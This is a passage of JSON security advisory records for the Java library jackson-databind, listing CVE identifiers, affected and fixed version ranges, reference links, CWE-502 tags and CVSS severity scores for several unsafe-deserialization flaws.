"WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/54aa38d87dcffa5ccc23e64922e9536c82c1b9c8" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/9593e16cf5a3d289a9c584f7123639655de9ddac" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/bc67eb11a7cf57561f861ff16f879f1fceb5779f" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2019/10/msg00001.html" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q7CANA7KV53JROZDX5Z5P26UG5VN2K43" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TH5VFUN4P7CCIP7KSEXYA5MUTFCUDUJT" }, { "type": "WEB", "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "WEB", "url": "https://seclists.org/bugtraq/2019/Oct/6" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20191017-0006" }, { "type": "WEB", "url": "https://www.debian.org/security/2019/dsa-4542" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0@%3Cissues.bookkeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b2e23c94f9dfef53e04c492e5d02e5c75201734be7adc73a49ef2370@%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/a430dbc9be874c41314cc69e697384567a9a24025e819d9485547954@%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/7782a937c9259a58337ee36b2961f00e2d744feafc13084e176d0df5@%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://issues.apache.org/jira/browse/GEODE-7255" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0445" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0164" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0161" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0160" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0159" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3901" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2019-10-28T19:19:01Z", "nvd_published_at": "2019-10-01T17:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-mx9v-gmh4-mgqw", "published": "2019-01-04T19:07:01Z", "modified": "2024-03-14T05:32:02.133724Z", "aliases": [ "CVE-2018-19361" ], "summary": "Deserialization of Untrusted Data in jackson-databind", "details": "FasterXML jackson-databind 2.x before 2.9.8 might allow attackers to have unspecified impact by leveraging failure to block the openjpa class from polymorphic deserialization.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.0" }, { "fixed": "2.7.9.5" } ] } ], "versions": [ "2.7.0", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.7.9.4", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/01/GHSA-mx9v-gmh4-mgqw/GHSA-mx9v-gmh4-mgqw.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.8" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/01/GHSA-mx9v-gmh4-mgqw/GHSA-mx9v-gmh4-mgqw.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.8.0" }, { "fixed": "2.8.11.3" } ] } ], "versions": [ "2.8.0", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.8.11.2", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/01/GHSA-mx9v-gmh4-mgqw/GHSA-mx9v-gmh4-mgqw.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-19361" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2186" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/bcce5a9c532b386c68dab2f6b3ce8b0cc9b950ec551766e76391caa3@%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/c70da3cb6e3f03e0ad8013e38b6959419d866c4a7c80fdd34b73f25c@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ff8dcfe29377088ab655fda9d585dccd5b1f07fabd94ae84fd60a7f8@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0@%3Cissues.bookkeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rca37935d661f4689cb4119f1b3b224413b22be161b678e6e6ce0c69b@%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2019/03/msg00005.html" }, { "type": "WEB", "url": "https://seclists.org/bugtraq/2019/May/68" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20190530-0003" }, { "type": "WEB", "url": "https://www.debian.org/security/2019/dsa-4452" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHBA-2019:0959" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:0782" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:0877" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1782" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1797" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1822" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1823" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2804" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2858" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3002" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3140" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3149" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3892" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:4037" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-mx9v-gmh4-mgqw" }, { "type": "WEB", "url": "https://issues.apache.org/jira/browse/TINKERPOP-2121" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/37e1ed724a1b0e5d191d98c822c426670bdfde83804567131847d2a3@%3Cdevnull.infra.apache.org%3E" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/107985" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:47:38Z", "nvd_published_at": null, "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-p43x-xfjf-5jhr", "published": "2020-05-15T18:59:01Z", "modified": "2024-03-15T00:33:14.700288Z", "aliases": [ "CVE-2020-9548" ], "summary": "jackson-databind mishandles the interaction between serialization gadgets and typing", "details": "FasterXML jackson-databind 2.x before 2.9.10.4, 2.8.11.6, and 2.7.9.7 mishandles the interaction between serialization gadgets and typing, related to br.com.anteros.dbcp.AnterosDBCPConfig (aka anteros-core).", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.10.4" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/05/GHSA-p43x-xfjf-5jhr/GHSA-p43x-xfjf-5jhr.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.8.0" }, { "fixed": "2.8.11.6" } ] } ], "versions": [ "2.8.0", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.11.4", "2.8.11.5", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/05/GHSA-p43x-xfjf-5jhr/GHSA-p43x-xfjf-5jhr.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.7.9.7" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2", "2.6.7.3", "2.6.7.4", "2.6.7.5", "2.7.0", "2.7.0-rc1", "2.7.0-rc2", "2.7.0-rc3", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5", "2.7.9.6" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/05/GHSA-p43x-xfjf-5jhr/GHSA-p43x-xfjf-5jhr.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-9548" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2634" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/1e64db6a2fad331f96c7363fda3bc5f3dffa25bb" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/9f4e97019fb0dd836533d0b6198c88787e235ae2" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20200904-0006" }, { "type": "WEB", "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/03/msg00008.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdd4df698d5d8e635144d2994922bf0842e933809eae259521f3b5097@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdd49ab9565bec436a896bc00c4b9fc9dce1598e106c318524fbdfec6@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd5a4457be4623038c3989294429bc063eec433a2e55995d81591e2ca@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb6fecb5e96a6d61e175ff49f33f2713798dd05cf03067c169d195596@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r98c9b6e4c9e17792e2cd1ec3e4aa20b61a791939046d3f10888176bb@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9464a40d25c3ba1a55622db72f113eb494a889656962d098c70c5bb1@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r35d30db00440ef63b791c4b7f7acb036e14d4a23afa2a249cb66c0fd@%3Cissues.zookeeper.apache.org%3E" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2020-04-23T19:24:13Z", "nvd_published_at": "2020-03-02T04:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-q93h-jc49-78gg", "published": "2020-05-15T18:59:10Z", "modified": "2024-03-16T05:19:47.711015Z", "aliases": [ "CVE-2020-9547" ], "summary": "jackson-databind mishandles the interaction between serialization gadgets and typing", "details": "FasterXML jackson-databind 2.x before 2.9.10.4, 2.8.11.6, and 2.7.9.7 mishandles the interaction between serialization gadgets and typing, related to `com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig` (aka `ibatis-sqlmap`).", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.10.4" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/05/GHSA-q93h-jc49-78gg/GHSA-q93h-jc49-78gg.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.8.0" }, { "fixed": "2.8.11.6" } ] } ], "versions": [ "2.8.0", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.11.4", "2.8.11.5", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/05/GHSA-q93h-jc49-78gg/GHSA-q93h-jc49-78gg.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.7.9.7" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2", "2.6.7.3", "2.6.7.4", "2.6.7.5", "2.7.0", "2.7.0-rc1", "2.7.0-rc2", "2.7.0-rc3", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5", "2.7.9.6" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/05/GHSA-q93h-jc49-78gg/GHSA-q93h-jc49-78gg.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-9547" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2634" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/9f4e97019fb0dd836533d0b6198c88787e235ae2" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20200904-0006" }, { "type": "WEB", "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/03/msg00008.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/redbe4f1e21bf080f637cf9fbec47729750a2f443a919765360337428@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdd4df698d5d8e635144d2994922bf0842e933809eae259521f3b5097@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdd49ab9565bec436a896bc00c4b9fc9dce1598e106c318524fbdfec6@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd5a4457be4623038c3989294429bc063eec433a2e55995d81591e2ca@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd0e958d6d5c5ee16efed73314cd0e445c8dbb4bdcc80fc9d1d6c11fc@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc0d5d0f72da1ed6fc5e438b1ddb3fa090c73006b55f873cf845375ab@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb6fecb5e96a6d61e175ff49f33f2713798dd05cf03067c169d195596@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra3e90712f2d59f8cef03fa796f5adf163d32b81fe7b95385f21790e6@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r98c9b6e4c9e17792e2cd1ec3e4aa20b61a791939046d3f10888176bb@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9464a40d25c3ba1a55622db72f113eb494a889656962d098c70c5bb1@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r893a0104e50c1c2559eb9a5812add28ae8c3e5f43712947a9847ec18@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r742ef70d126548dcf7de5be5779355c9d76a9aec71d7a9ef02c6398a@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4accb2e0de9679174efd3d113a059bab71ff3ec53e882790d21c1cc1@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r35d30db00440ef63b791c4b7f7acb036e14d4a23afa2a249cb66c0fd@%3Cissues.zookeeper.apache.org%3E" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2020-04-22T20:58:56Z", "nvd_published_at": "2020-03-02T04:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-qjw2-hr98-qgfh", "published": "2021-12-09T19:15:36Z", "modified": "2024-02-18T05:20:56.894470Z", "aliases": [ "CVE-2020-24750" ], "summary": "Unsafe Deserialization in jackson-databind", "details": "FasterXML jackson-databind 2.x before 2.6.7.5 and from 2.7.x before 2.9.10.6 mishandles the interaction between serialization gadgets and typing, related to com.pastdev.httpcomponents.configuration.JndiConfiguration.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0" }, { "fixed": "2.6.7.5" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2", "2.6.7.3", "2.6.7.4" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.6.7.4", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/12/GHSA-qjw2-hr98-qgfh/GHSA-qjw2-hr98-qgfh.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.0" }, { "fixed": "2.9.10.6" } ] } ], "versions": [ "2.7.0", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5", "2.7.9.6", "2.7.9.7", "2.8.0", "2.8.0.rc1", "2.8.0.rc2", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.11.4", "2.8.11.5", "2.8.11.6", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9", "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.10.4", "2.9.10.5", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.9.10.5", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/12/GHSA-qjw2-hr98-qgfh/GHSA-qjw2-hr98-qgfh.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-24750" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2798" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/2118e71325486c68f089a9761c9d8a11b4ddd1cb" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/6cc9f1a1af323cd156f5668a47e43bab324ae16f" }, { "type": "WEB", "url": 